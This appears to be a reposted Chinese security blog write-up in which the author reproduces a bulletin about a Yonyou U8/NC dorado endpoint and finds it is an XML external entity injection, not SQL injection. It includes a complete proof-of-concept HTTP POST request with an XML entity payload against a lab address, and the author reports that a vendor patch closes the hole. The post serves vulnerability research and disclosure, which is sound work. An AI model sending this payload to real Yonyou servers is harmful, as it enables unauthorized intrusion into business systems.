|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
2024年4月@不会飞的鱼师傅投稿分享的一篇文章,记录的是他因一起用友的漏洞通告而找到对应的POC并对该漏洞进行复现测试的过程,文章版权归原作者所有。
0x00 前言
yongyou-u8c-sqli-showRPCLoadingTip
,一个用友U8的SQL注入,可是我找遍了浏览器都没找到这个漏洞,瞬间怀疑人生,在github搜索找到相关一段代码长这样。<servlet-mapping>
<servlet-name>DoradoServlet</servlet-name>
<url-pattern>/dorado/smartweb2.showRPCLoadingTip.d</url-pattern>
</servlet-mapping>
是一个叫dorado的中间件,全称叫“dorado展现中间件”,既然找到了源码那就搭建看一看吧,可惜菜鸡一个并么有运行起来...。
https://github.com/LoveSnowBear/lovesnowbear.github.com/
没运行起来就没运行起来吧,那就用通告呢抓个包跑一下sqlmap,可惜sqlmap告诉我参数被污染(我并没有污染参数),突然头大了,难道要手动验证?
后续搜索U8的注入看见一个XML实体注入漏洞smartweb2.RPC.d
XML外部实体注入,这不是和我的smartweb2.showRPCLoadingTip.d
参数很像吗?瞬间想到有没有可能这并不是一个SQL注入,而是一个XML实体注入漏洞,后续证实这就是一个XML注入。
由于没有在公网找到相关记录,遂记录一下(在这我还惊喜一下,网络没记录那是不是可以申请一个证书,想多啦,打补丁后就修复了,可能影响v5以下呢吧)。
0x01 环境搭建
0x02 漏洞验证(想法验证)
smartweb2.RPC.d
接口XML外部实体注入漏洞一个类型,那是否payload通用,证明是可行的,应该是U8引用了dorado5,NC也应该有类似漏洞,因为smartweb2.RPC.d_XML
外部实体注入NC和U8cloud都存在。POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?__rpc=true HTTP/1.1
Host: 192.168.83.130:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 262
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
在github中的源码像这样的接口有好几个,我都跑了一下都可以实现XML注入,不一一举例了。
https://github.com/LoveSnowBear/lovesnowbear.github.com/blob/77c78bb7b250dd35e7d139fef03356f474ca0630/daordo5with7/dorado5/web/WEB-INF/web.xml
这个应用也引用了dorado可惜年代久远:
https://github.com/bellmit/tmsvat/blob/6ecab97ca730cc070d89e2092b0b20012175774f/deloitte.tms.pl/deloitte.tms.pl.attachment.core/src/main/webapp/WEB-INF/web.xml#L154
在github中看web.xml只有daordo5写有这样的路由,daordo5-2和daordo7没有相似路由。
dorado5-2-web.xml
dorado7-web.xml
0x03 遐想验证,打补丁后验证
https://security.yonyou.com/#/patchInfo?identifier=3c900fd6f90943afb43f699c8be59557
更新补丁后验证
*****人生如戏咯*****
原文始发于微信公众号(TtTeam):记一次通告引起的漏洞复现记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论